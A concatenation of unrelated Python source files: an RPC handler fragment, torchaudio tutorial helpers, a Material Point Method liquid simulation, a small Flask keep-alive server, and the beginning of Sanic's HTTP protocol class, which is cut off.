self.retrieving_thread.stopAndWait()
def invoke(self, invoker):
'''
invoke a rpc message
<p> 这里是异步模型,仅仅将invoker放入invoker处理队列, 因此不会阻塞</p>
@return InvokeResult
'''
if not self.isrunning:
RPCLog.getLogger().error(self.__class__.__name__,'handler is not running yet')
raise HandlerStopError("try to invoke before handler run")
try:
self.invoking_thread.push(invoker, self.DEFAULT_TIMEOUT)
except MessageFullError:
RPCLog.getLogger().error(self.__class__.__name__,'timeout when inovke %s' %invoker)
raise HandlerBusyError('inovke timeout')
except StopError:
RPCLog.getLogger().critical(self.__class__.__name__,'fatal error when inovke %s' %invoker)
raise HandlerStopError('inovke failed')
def retrieve(self):
'''
\ 从retrieve队列中取出一个消息。
@note: 会一直阻塞,直到取到一个。如 果超时,则返回None
@return: return a message. If failed for some reason, exception will be raised
'''
if not self.isrunning:
RPCLog.getLogger().error(self.__class__.__name__,'handler is not running yet')
raise HandlerStopError("try to retrieve before handler run")
try:
message = self.retrieving_thread.pop(self.DEFAULT_TIMEOUT)
return message
except MessageEmptyError:
pass #忽略
except StopError :
RPCLog.getLogger().critical(self.__class__.__name__,'fatal error when retrieve')
raise HandlerStopError('retrieve failed')
def __dealing_invoker(self):
while self.isrunning:
try:
# 不考虑超时。超时意味着暂时没有请求任务
invoker = self.invoking_thread.pop()
except StopError:
RPCLog.getLogger().exception(self.__class__.__name__,'stop invoking thread for exception')
break
try:
self.channel.send(invoker.message)
except (ChannelBrokenError, ChannelClosedError):
RPCLog.getLogger().exception(self.__class__.__name__, 'stop invoking thread for exception')
break
except ChannelDataError:
continue
def __receive_invoker(self):
while self.isrunning:
try :
message = self.channel.recv()
except (ChannelBrokenError, ChannelClosedError):
RPCLog.getLogger().exception(self.__class__.__name__, 'stop retrieving thread for exception')
break
except ChannelDataError:
continue
except Exception:
RPCLog.getLogger().exception(self.__class__.__name__, 'an exception happened when retrieving')
continue
if message is None: continue
try:
#不考虑满的情况
self.retrieving_thread.push(message)
except MessageFullError as e:
RPCLog.getLogger().exception(self.__class__.__name__,'__receive_invoker: message(%s) is discard for %s' %(message, e))
except StopError:
RPCLog.getLogger().exception(self.__class__.__name__,'stop retrieving thread for exception')
break
self.retrieving_thread.push(None) #FIXME:: add an empty message to avoid recv blocking
|
audioutil.py
|
#@title Prepare data and utility functions. {display-mode: "form"}
#@markdown
#@markdown You do not need to look into this cell.
#@markdown Just execute once and you are good to go.
#@markdown
#@markdown In this tutorial, we will use a speech data from [VOiCES dataset](https://iqtlabs.github.io/voices/), which is licensed under Creative Commos BY 4.0.
#-------------------------------------------------------------------------------
# Preparation of data and helper functions.
#-------------------------------------------------------------------------------
import io
import os
import math
import tarfile
import multiprocessing
import scipy
import librosa
import torchaudio
import torch
import boto3
from botocore import UNSIGNED
from botocore.config import Config
import requests
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import time
from IPython.display import Audio, display
[width, height] = matplotlib.rcParams['figure.figsize']
if width < 10:
matplotlib.rcParams['figure.figsize'] = [width * 2.5, height]
_SAMPLE_DIR = "_sample_data"
SAMPLE_WAV_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/steam-train-whistle-daniel_simon.wav"
SAMPLE_WAV_PATH = os.path.join(_SAMPLE_DIR, "steam.wav")
SAMPLE_WAV_SPEECH_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit/source-16k/train/sp0307/Lab41-SRI-VOiCES-src-sp0307-ch127535-sg0042.wav"
SAMPLE_WAV_SPEECH_PATH = os.path.join(_SAMPLE_DIR, "speech.wav")
SAMPLE_RIR_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit/distant-16k/room-response/rm1/impulse/Lab41-SRI-VOiCES-rm1-impulse-mc01-stu-clo.wav"
SAMPLE_RIR_PATH = os.path.join(_SAMPLE_DIR, "rir.wav")
SAMPLE_NOISE_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit/distant-16k/distractors/rm1/babb/Lab41-SRI-VOiCES-rm1-babb-mc01-stu-clo.wav"
SAMPLE_NOISE_PATH = os.path.join(_SAMPLE_DIR, "bg.wav")
SAMPLE_MP3_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/steam-train-whistle-daniel_simon.mp3"
SAMPLE_MP3_PATH = os.path.join(_SAMPLE_DIR, "steam.mp3")
SAMPLE_GSM_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/steam-train-whistle-daniel_simon.gsm"
SAMPLE_GSM_PATH = os.path.join(_SAMPLE_DIR, "steam.gsm")
SAMPLE_TAR_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit.tar.gz"
SAMPLE_TAR_PATH = os.path.join(_SAMPLE_DIR, "sample.tar.gz")
SAMPLE_TAR_ITEM = "VOiCES_devkit/source-16k/train/sp0307/Lab41-SRI-VOiCES-src-sp0307-ch127535-sg0042.wav"
S3_BUCKET = "pytorch-tutorial-assets"
S3_KEY = "VOiCES_devkit/source-16k/train/sp0307/Lab41-SRI-VOiCES-src-sp0307-ch127535-sg0042.wav"
YESNO_DATASET_PATH = os.path.join(_SAMPLE_DIR, "yes_no")
os.makedirs(YESNO_DATASET_PATH, exist_ok=True)
os.makedirs(_SAMPLE_DIR, exist_ok=True)
def _fetch_data():
uri = [
(SAMPLE_WAV_URL, SAMPLE_WAV_PATH),
(SAMPLE_WAV_SPEECH_URL, SAMPLE_WAV_SPEECH_PATH),
(SAMPLE_RIR_URL, SAMPLE_RIR_PATH),
(SAMPLE_NOISE_URL, SAMPLE_NOISE_PATH),
(SAMPLE_MP3_URL, SAMPLE_MP3_PATH),
(SAMPLE_GSM_URL, SAMPLE_GSM_PATH),
(SAMPLE_TAR_URL, SAMPLE_TAR_PATH),
]
for url, path in uri:
with open(path, 'wb') as file_:
file_.write(requests.get(url).content)
_fetch_data()
def _download_yesno():
if os.path.exists(os.path.join(YESNO_DATASET_PATH, "waves_yesno.tar.gz")):
return
torchaudio.datasets.YESNO(root=YESNO_DATASET_PATH, download=True)
YESNO_DOWNLOAD_PROCESS = multiprocessing.Process(target=_download_yesno)
YESNO_DOWNLOAD_PROCESS.start()
def _get_sample(path, resample=None):
effects = [
["remix", "1"]
]
if resample:
effects.extend([
["lowpass", f"{resample // 2}"],
["rate", f'{resample}'],
])
return torchaudio.sox_effects.apply_effects_file(path, effects=effects)
def get_speech_sample(*, resample=None):
return _get_sample(SAMPLE_WAV_SPEECH_PATH, resample=resample)
def get_sample(*, resample=None):
return _get_sample(SAMPLE_WAV_PATH, resample=resample)
def get_rir_sample(*, resample=None, processed=False):
rir_raw, sample_rate = _get_sample(SAMPLE_RIR_PATH, resample=resample)
if not processed:
return rir_raw, sample_rate
rir = rir_raw[:, int(sample_rate*1.01):int(sample_rate*1.3)]
rir = rir / torch.norm(rir, p=2)
rir = torch.flip(rir, [1])
return rir, sample_rate
def get_noise_sample(*, resample=None):
return _get_sample(SAMPLE_NOISE_PATH, resample=resample)
def print_stats(waveform, sample_rate=None, src=None):
if src:
print("-" * 10)
print("Source:", src)
print("-" * 10)
if sample_rate:
print("Sample Rate:", sample_rate)
print("Shape:", tuple(waveform.shape))
print("Dtype:", waveform.dtype)
print(f" - Max: {waveform.max().item():6.3f}")
print(f" - Min: {waveform.min().item():6.3f}")
print(f" - Mean: {waveform.mean().item():6.3f}")
print(f" - Std Dev: {waveform.std().item():6.3f}")
print()
print(waveform)
print()
def plot_waveform(waveform, sample_rate, title="Waveform", xlim=None, ylim=None):
waveform = waveform.numpy()
num_channels, num_frames = waveform.shape
time_axis = torch.arange(0, num_frames) / sample_rate
figure, axes = plt.subplots(num_channels, 1)
if num_channels == 1:
axes = [axes]
for c in range(num_channels):
axes[c].plot(time_axis, waveform[c], linewidth=1)
axes[c].grid(True)
if num_channels > 1:
axes[c].set_ylabel(f'Channel {c+1}')
if xlim:
axes[c].set_xlim(xlim)
if ylim:
axes[c].set_ylim(ylim)
figure.suptitle(title)
plt.show(block=False)
def plot_specgram(waveform, sample_rate, title="Spectrogram", xlim=None):
waveform = waveform.numpy()
num_channels, num_frames = waveform.shape
time_axis = torch.arange(0, num_frames) / sample_rate
figure, axes = plt.subplots(num_channels, 1)
if num_channels == 1:
axes = [axes]
for c in range(num_channels):
axes[c].specgram(waveform[c], Fs=sample_rate)
if num_channels > 1:
axes[c].set_ylabel(f'Channel {c+1}')
if xlim:
axes[c].set_xlim(xlim)
figure.suptitle(title)
plt.show(block=False)
def play_audio(waveform, sample_rate):
waveform = waveform.numpy()
num_channels, num_frames = waveform.shape
if num_channels == 1:
display(Audio(waveform[0], rate=sample_rate))
elif num_channels == 2:
display(Audio((waveform[0], waveform[1]), rate=sample_rate))
else:
raise ValueError("Waveform with more than 2 channels are not supported.")
def inspect_file(path):
print("-" * 10)
print("Source:", path)
print("-" * 10)
print(f" - File size: {os.path.getsize(path)} bytes")
print(f" - {torchaudio.info(path)}")
def plot_spectrogram(spec, title=None, ylabel='freq_bin', aspect='auto', xmax=None):
fig, axs = plt.subplots(1, 1)
axs.set_title(title or 'Spectrogram (db)')
axs.set_ylabel(ylabel)
axs.set_xlabel('frame')
im = axs.imshow(librosa.power_to_db(spec), origin='lower', aspect=aspect)
if xmax:
axs.set_xlim((0, xmax))
fig.colorbar(im, ax=axs)
plt.show(block=False)
def plot_mel_fbank(fbank, title=None):
fig, axs = plt.subplots(1, 1)
axs.set_title(title or 'Filter bank')
axs.imshow(fbank, aspect='auto')
axs.set_ylabel('frequency bin')
axs.set_xlabel('mel bin')
plt.show(block=False)
def envelope(y, rate, threshold):
# tracks the signal with a rolling average. Provides the ability to clean and remove dead audio
mask = []
y = pd.Series(y).apply(np.abs)
y_mean = y.rolling(window=int(rate/20),
min_periods=1,
center=True).max()
for mean in y_mean:
if mean > threshold:
mask.append(True)
else:
mask.append(False)
return mask, y_mean
def get_spectrogram(
n_fft = 400,
win_len = None,
hop_len = None,
power = 2.0,
):
waveform, _ = get_speech_sample()
spectrogram = T.Spectrogram(
n_fft=n_fft,
win_length=win_len,
hop_length=hop_len,
center=True,
pad_mode="reflect",
power=power,
)
return spectrogram(waveform)
def plot_pitch(waveform, sample_rate, pitch):
figure, axis = plt.subplots(1, 1)
axis.set_title("Pitch Feature")
axis.grid(True)
end_time = waveform.shape[1] / sample_rate
time_axis = torch.linspace(0, end_time, waveform.shape[1])
axis.plot(time_axis, waveform[0], linewidth=1, color='gray', alpha=0.3)
axis2 = axis.twinx()
time_axis = torch.linspace(0, end_time, pitch.shape[1])
ln2 = axis2.plot(
time_axis, pitch[0], linewidth=2, label='Pitch', color='green')
axis2.legend(loc=0)
plt.show(block=False)
def plot_kaldi_pitch(waveform, sample_rate, pitch, nfcc):
figure, axis = plt.subplots(1, 1)
axis.set_title("Kaldi Pitch Feature")
axis.grid(True)
end_time = waveform.shape[1] / sample_rate
time_axis = torch.linspace(0, end_time, waveform.shape[1])
axis.plot(time_axis, waveform[0], linewidth=1, color='gray', alpha=0.3)
time_axis = torch.linspace(0, end_time, pitch.shape[1])
ln1 = axis.plot(time_axis, pitch[0], linewidth=2, label='Pitch', color='green')
axis.set_ylim((-1.3, 1.3))
axis2 = axis.twinx()
time_axis = torch.linspace(0, end_time, nfcc.shape[1])
ln2 = axis2.plot(
time_axis, nfcc[0], linewidth=2, label='NFCC', color='blue', linestyle='--')
lns = ln1 + ln2
labels = [l.get_label() for l in lns]
axis.legend(lns, labels, loc=0)
plt.show(block=False)
DEFAULT_OFFSET = 201
SWEEP_MAX_SAMPLE_RATE = 48000
DEFAULT_LOWPASS_FILTER_WIDTH = 6
DEFAULT_ROLLOFF = 0.99
DEFAULT_RESAMPLING_METHOD = 'sinc_interpolation'
def _get_log_freq(sample_rate, max_sweep_rate, offset):
"""Get freqs evenly spaced out in log-scale, between [0, max_sweep_rate // 2]
offset is used to avoid negative infinity `log(offset + x)`.
"""
half = sample_rate // 2
start, stop = math.log(offset), math.log(offset + max_sweep_rate // 2)
return torch.exp(torch.linspace(start, stop, sample_rate, dtype=torch.double)) - offset
def _get_inverse_log_freq(freq, sample_rate, offset):
"""Find the time where the given frequency is given by _get_log_freq"""
half = sample_rate // 2
return sample_rate * (math.log(1 + freq / offset) / math.log(1 + half / offset))
def _get_freq_ticks(sample_rate, offset, f_max):
# Given the original sample rate used for generating the sweep,
# find the x-axis value where the log-scale major frequency values fall in
time, freq = [], []
for exp in range(2, 5):
for v in range(1, 10):
f = v * 10 ** exp
if f < sample_rate // 2:
t = _get_inverse_log_freq(f, sample_rate, offset) / sample_rate
time.append(t)
freq.append(f)
t_max = _get_inverse_log_freq(f_max, sample_rate, offset) / sample_rate
time.append(t_max)
freq.append(f_max)
return time, freq
def plot_sweep(waveform, sample_rate, title, max_sweep_rate=SWEEP_MAX_SAMPLE_RATE, offset=DEFAULT_OFFSET):
x_ticks = [100, 500, 1000, 5000, 10000, 20000, max_sweep_rate // 2]
y_ticks = [1000, 5000, 10000, 20000, sample_rate//2]
time, freq = _get_freq_ticks(max_sweep_rate, offset, sample_rate // 2)
freq_x = [f if f in x_ticks and f <= max_sweep_rate // 2 else None for f in freq]
freq_y = [f for f in freq if f >= 1000 and f in y_ticks and f <= sample_rate // 2]
figure, axis = plt.subplots(1, 1)
axis.specgram(waveform[0].numpy(), Fs=sample_rate)
plt.xticks(time, freq_x)
plt.yticks(freq_y, freq_y)
axis.set_xlabel('Original Signal Frequency (Hz, log scale)')
axis.set_ylabel('Waveform Frequency (Hz)')
axis.xaxis.grid(True, alpha=0.67)
axis.yaxis.grid(True, alpha=0.67)
figure.suptitle(f'{title} (sample rate: {sample_rate} Hz)')
plt.show(block=True)
def get_sine_sweep(sample_rate, offset=DEFAULT_OFFSET):
max_sweep_rate = sample_rate
freq = _get_log_freq(sample_rate, max_sweep_rate, offset)
delta = 2 * math.pi * freq / sample_rate
cummulative = torch.cumsum(delta, dim=0)
signal = torch.sin(cummulative).unsqueeze(dim=0)
return signal
def benchmark_resample(
method,
waveform,
sample_rate,
resample_rate,
lowpass_filter_width=DEFAULT_LOWPASS_FILTER_WIDTH,
rolloff=DEFAULT_ROLLOFF,
resampling_method=DEFAULT_RESAMPLING_METHOD,
beta=None,
librosa_type=None,
iters=5
):
if method == "functional":
begin = time.time()
for _ in range(iters):
F.resample(waveform, sample_rate, resample_rate, lowpass_filter_width=lowpass_filter_width,
rolloff=rolloff, resampling_method=resampling_method)
elapsed = time.time() - begin
return elapsed / iters
elif method == "transforms":
resampler = T.Resample(sample_rate, resample_rate, lowpass_filter_width=lowpass_filter_width,
rolloff=rolloff, resampling_method=resampling_method, dtype=waveform.dtype)
begin = time.time()
for _ in range(iters):
resampler(waveform)
elapsed = time.time() - begin
return elapsed / iters
elif method == "librosa":
waveform_np = waveform.squeeze().numpy()
begin = time.time()
for _ in range(iters):
librosa.resample(waveform_np, sample_rate, resample_rate, res_type=librosa_type)
elapsed = time.time() - begin
return elapsed / iters
|
Liquid.py
|
"""
Liquid.py - Python+Pygame port V1 Robert Rasmay
MIT License ( http://www.opensource.org/licenses/mit-license.php )
/**
* self version:
* Copyright Stephen Sinclair (radarsat1) (http://www.music.mcgill.ca/~sinclair)
* MIT License ( http://www.opensource.org/licenses/mit-license.php )
* Downloaded from: http://www.music.mcgill.ca/~sinclair/blog
*/
/**
* Flash version:
* Copyright iunpin ( http://wonderfl.net/user/iunpin )
* MIT License ( http://www.opensource.org/licenses/mit-license.php )
* Downloaded from: http://wonderfl.net/c/6eu4
*/
/**
* Original Java version:
* http://grantkot.com/MPM/Liquid.html
*/
"""
import math
import random
from collections import namedtuple
RANGE = range(3)
RANGE2 = [(i, j) for i in RANGE for j in RANGE]
'''Some of these parameters are hard to explain in one or two sentences
(and a couple I made up) so I'll also link you to their corresponding
Wikipedia pages. One object I like to compare fluids with is springs.
Everybody is familiar with springs. If you pull on them they'll try to go
back to their original shape. Some springs are stronger and some are weaker
(stiffness and elasticity). Some springs will continue to bounce back and
forth for a long time, while others will quickly slow down and stop (bulk
viscosity and viscosity). If you pull hard enough the spring will break.
Density - Target density for the particles. Higher density makes particles
want to be closer together.
Stiffness - How compressible the fluid is.
Bulk viscosity - Kind of like damping. Another effect it will have is that
it'll smooth out shockwaves.
Elasticity - How fast the fluid will try to return to its original shape.
Viscosity - Kind of like bulk viscosity only this operates on the shear
components.
Yield rate - How fast the fluid forgets its shape or melts away. Only
affects things when elasticity is non-zero.
Gravity - How much the particles will accelerate downwards.
Smoothing - Smooths the velocity field. Will make things more stable. It is
also useful to have a high smoothing value when simulating elastic
materials.
'''
Material = namedtuple('Material', ['m', 'rd', 'k', 'v', 'd', 'g'])
class LiquidTest:
def __init__ (self, width, height, particles):
self.width = width
self.height = height
self.active = []
self.pressed = False
self.pressedprev = False
self.mouse = [0.0, 0.0]
self.mouse_prev = [0.0, 0.0]
self.grid = [[Node() for h in range(self.height)]
for w in range(self.width)]
water = Material(3, 1.0, 1.0, 1.0, 1.0, 1.0)
self.particles = [Particle(water, x + 4, y + 4, 0.0, 0.0)
for y in range(particles[1]) for x in range(particles[0])]
@staticmethod
def _equation1(x):
'''Returns two lists of lenth 3.'''
pressure = [0.0, 0.0, 0.0]
gravity = [0.0, 0.0, 0.0]
pressure[0] = 0.5 * x * x + 1.5 * x + 1.125
gravity[0] = x + 1.5
x += 1.0
pressure[1] = -x * x + 0.75
gravity[1] = -2.0 * x
x += 1.0
pressure[2] = 0.5 * x * x - 1.5 * x + 1.125
gravity[2] = x - 1.5
return pressure, gravity
def _step1(self):
for particle in self.particles:
particle.cx = int(particle.x - 0.5)
particle.cy = int(particle.y - 0.5)
particle.px, particle.gx = self._equation1(particle.cx - particle.x)
particle.py, particle.gy = self._equation1(particle.cy - particle.y)
for i, j in RANGE2:
n = self.grid[particle.cx + i][particle.cy + j]
if not n.active:
n.active = True
self.active.append(n)
phi = particle.px[i] * particle.py[j]
n.m += phi * particle.material.m
n.d += phi
n.gx += particle.gx[i] * particle.py[j]
n.gy += particle.px[i] * particle.gy[j]
def _density_summary(self, drag, mdx, mdy):
for p in self.particles:
cx = p.x
cy = p.y
cxi = cx + 1
cyi = cy + 1
n01 = self.grid[int(cx)][int(cy)]
n02 = self.grid[int(cx)][int(cyi)]
n11 = self.grid[int(cxi)][int(cy)]
n12 = self.grid[int(cxi)][int(cyi)]
pdx = n11.d - n01.d
pdy = n02.d - n01.d
C20 = 3.0 * pdx - n11.gx - 2.0 * n01.gx
C02 = 3.0 * pdy - n02.gy - 2.0 * n01.gy
C30 = -2.0 * pdx + n11.gx + n01.gx
C03 = -2.0 * pdy + n02.gy + n01.gy
csum1 = n01.d + n01.gy + C02 + C03
csum2 = n01.d + n01.gx + C20 + C30
C21 = 3.0 * n12.d - 2.0 * n02.gx - n12.gx - 3.0 * csum1 - C20
C31 = -2.0 * n12.d + n02.gx + n12.gx + 2.0 * csum1 - C30
C12 = 3.0 * n12.d - 2.0 * n11.gy - n12.gy - 3.0 * csum2 - C02
C13 = -2.0 * n12.d + n11.gy + n12.gy + 2.0 * csum2 - C03
C11 = n02.gx - C13 - C12 - n01.gx
u = p.x - cx
u2 = u * u
u3 = u * u2
v = p.y - cy
v2 = v * v
v3 = v * v2
density = (n01.d + n01.gx * u + n01.gy * v + C20 * u2 + C02 * v2 +
C30 * u3 + C03 * v3 + C21 * u2 * v + C31 * u3 * v + C12 * u *
v2 + C13 * u * v3 + C11 * u * v)
pressure = density - 1.0
if pressure > 2.0:
pressure = 2.0
fx = 0.0
fy = 0.0
if p.x < 4.0:
fx += p.material.m * (4.0 - p.x)
elif p.x > self.width:
fx += p.material.m * (self.width - p.x)
if p.y < 4.0:
fy += p.material.m * (4.0 - p.y)
elif p.y > self.height:
fy += p.material.m * (self.height - p.y)
if drag:
vx = math.fabs(p.x - self.mouse[0])
vy = math.fabs(p.y - self.mouse[1])
if vx < 10.0 > vy:
weight = (p.material.m * (1.0 - vx * 0.10) *
(1.0 - vy * 0.10))
fx += weight * (mdx - p.u)
fy += weight * (mdy - p.v)
for i, j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
n.ax += -(p.gx[i] * p.py[j] * pressure) + fx * phi
n.ay += -(p.px[i] * p.gy[j] * pressure) + fy * phi
def _step3(self):
for p in self.particles:
for i, j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
p.u += phi * n.ax
p.v += phi * n.ay
mu = p.material.m * p.u
mv = p.material.m * p.v
for i, j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
n.u += phi * mu
n.v += phi * mv
def _step4(self):
for p in self.particles:
gu = 0.0
gv = 0.0
for i,j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
gu += phi * n.u
gv += phi * n.v
p.x += gu
p.y += gv
p.u += 1.0 * (gu - p.u)
p.v += 1.0 * (gv - p.v)
if p.x < 1.0:
p.x = 1.0 + random.random() * 0.01
p.u = 0.0
elif p.x > self.width - 2:
p.x = self.width - 3 - random.random() * 0.01
p.u = 0.0
if p.y < 1.0:
p.y = 1.0 + random.random() * 0.01
p.v = 0.0
elif p.y > self.height - 2:
p.y = self.height - 3 - random.random() * 0.01
p.v = 0.0
def simulate(self):
drag = False
mdx = mdy = 0.0
if self.pressed and self.pressedprev:
drag = True
mdx = self.mouse[0] - self.mouse_prev[0]
mdy = self.mouse[1] - self.mouse_prev[1]
self.pressedprev = self.pressed
self.mouse_prev[0] = self.mouse[0]
self.mouse_prev[1] = self.mouse[1]
for node in self.active:
node.__init__()
self.active = []
self._step1()
self._density_summary(drag, mdx, mdy)
for n in self.active:
if n.m > 0.0:
n.ax /= n.m
n.ay /= n.m
n.ay += 0.03
self._step3()
for n in self.active:
if n.m > 0.0:
n.u /= n.m
n.v /= n.m
self._step4()
class Node:
def __init__(self):
self.m = 0
self.d = 0
self.gx = 0
self.gy = 0
self.u = 0
self.v = 0
self.ax = 0
self.ay = 0
self.active = False
class Particle:
'''Particles are value holders that manage the mathematical and physical
attributes of an object'''
def __init__(self, material, x, y, u, v):
self.cx = 0
self.cy = 0
self.px = [0.0, 0.0, 0.0]
self.py = [0.0, 0.0, 0.0]
self.gx = [0.0, 0.0, 0.0]
self.gy = [0.0, 0.0, 0.0]
self.material = material
self.x = x
self.y = y
self.u = u
self.v = v
try:
self.color = pygame.Color(0, 0, 255, 255)
except NameError:
self.color = (0, 0, 255)
def pygame_main(liquid):
'''The main loop for the pygame interface. The pygame window will be 4
times wider and 4 times taller than the width and height of the liquid
simulation. It uses a standard double buffered sdl window. With pygame the
simulation speed and the framerate are locked together. You can use the
mouse to click and drag around the particles.'''
import pygame
import pygame.locals
pygame.init()
canvas = pygame.display.set_mode(
(liquid.width*4, liquid.height*4), pygame.DOUBLEBUF)
while True:
# clear
canvas.fill(0, (3, 3, liquid.width*4-4, liquid.height*4-4))
# draw simulation state
for p in liquid.particles:
pygame.draw.line(
canvas,
p.color,
(4*p.x, 4*p.y,),
(4*(p.x - p.u), 4*(p.y - p.v))
)
pygame.display.flip()
#get events
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
return
elif event.type == pygame.locals.MOUSEBUTTONDOWN:
liquid.pressed = True
elif event.type == pygame.locals.MOUSEBUTTONUP:
liquid.pressed = False
elif event.type == pygame.locals.MOUSEMOTION:
liquid.mouse[0] = event.pos[0]/4
liquid.mouse[1] = event.pos[1]/4
# advance simulation
liquid.simulate()
def pyglet_main(liquid):
'''Creates a pyglet window and context that will be 4 times wider and 4
times taller than the simulation area. Pyglet uses asynchronous event
handlers so there are a few functions here to handle those events and
update the simulation variables. The framerate is not tied to the
simulation speed because the simulation is run in it's own thread and
pyglet is tricked into updating at 30Hz.'''
from pyglet.window import mouse, Screen, key
from pyglet import gl, clock, app, graphics
import pyglet.window
import threading
window = pyglet.window.Window(
width = liquid.width * 4, height = liquid.height * 4
)
@window.event
def on_draw():
'''The draw command is one glDraw command after gathering all of the
vertex information from the simulation. The draw loop first draws the
lines in simulation coordinates which is then "scaled" up using
glMatrixmode.'''
window.clear()
vertices = []
colors = []
for p in liquid.particles:
vertices.extend([p.x, p.y, p.x - p.u, p.y - p.v])
colors.extend(p.color)
colors.extend([0, 0, 0])
graphics.draw(
len(liquid.particles)*2,
gl.GL_LINES,
('v2f', vertices),
('c3B', colors)
)
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glLoadIdentity()
gl.glOrtho(0, liquid.width, liquid.height, 0, -1, 1)
gl.glMatrixMode(gl.GL_MODELVIEW)
@window.event
def on_mouse_press(x, y, button, modifiers):
'''Takes mouse press coordinates and sends them to the liquid
simulation object.'''
if button == mouse.LEFT:
liquid.mouse[0] = x/4
liquid.mouse[1] = liquid.height - y/4
liquid.pressed = True
@window.event
def on_mouse_release(x, y, button, modifiers):
'''Tells the liquid simulation to stop tracking the mouse.'''
liquid.pressed = False
@window.event
def on_mouse_drag(x, y, dx, dy, button, modifiers):
'''Updates the liquid simulation mouse coordinates.'''
if button == mouse.LEFT:
liquid.mouse[0] = x/4
liquid.mouse[1] = liquid.height - y/4
stop = threading.Event()
def loop(lt, stop):
'''This is an endless but stoppable loop to run the simulation in a
thread while pyglet handles the drawing and mouse events.'''
while True:
lt.simulate()
if stop.is_set():
break
def induce_paint(dt):
'''This is a dummy function that is added to the pyglet schedule so
that the screen can be updated in a timely fashion independent of the
simulation.'''
pass
worker = threading.Thread(target=loop, args=(liquid, stop))
clock.schedule_interval(induce_paint, 1.0/30.0)
worker.start()
app.run()
stop.set()
worker.join()
if __name__ == "__main__":
import argparse
PARSER = argparse.ArgumentParser(
prog='Liquid.py',
description='Material Point Method liquid simulation',
)
PARSER.add_argument('--width',
help='The width of the simulation area', default=100)
PARSER.add_argument('--height',
help='The height of the simulation area', default=100)
PARSER.add_argument('--columns',
help='The number of particle columns', default=50)
PARSER.add_argument('--rows',
help='The number of particle rows', default=80)
PARSER.add_argument('--n',
help='The number of iterations to run the simulation.',
default=200)
PARSER.add_argument('-i', '--interactive',
help='Run the simulation interactively with pygame or pyglet',
choices=['pygame', 'pyglet'])
ARGS = PARSER.parse_args()
LIQUID_TEST = LiquidTest(ARGS.width, ARGS.height, (ARGS.columns, ARGS.rows))
if ARGS.interactive == 'pygame':
pygame_main(LIQUID_TEST)
elif ARGS.interactive == 'pyglet':
pyglet_main(LIQUID_TEST)
else:
import timeit
TIMER = timeit.Timer('LIQUID_TEST.simulate()',
setup='from __main__ import LIQUID_TEST')
TOTAL = TIMER.timeit(ARGS.n)
print "Total simulation time: {0}".format(TOTAL)
print "Average simulation frame time: {0}".format(TOTAL/ARGS.n)
|
web_server.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Server is up!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
server.py
|
import asyncio
import os
import traceback
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser
from httptools.parser.errors import HttpParserError
from sanic.compat import Header
from sanic.exceptions import (
HeaderExpectationFailed,
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import EXPECT_HEADER, Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# app
"app",
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
app,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.app = app
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections if connections is not None else set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
:return: ``True`` if connection is to be kept alive ``False`` else
"""
return (
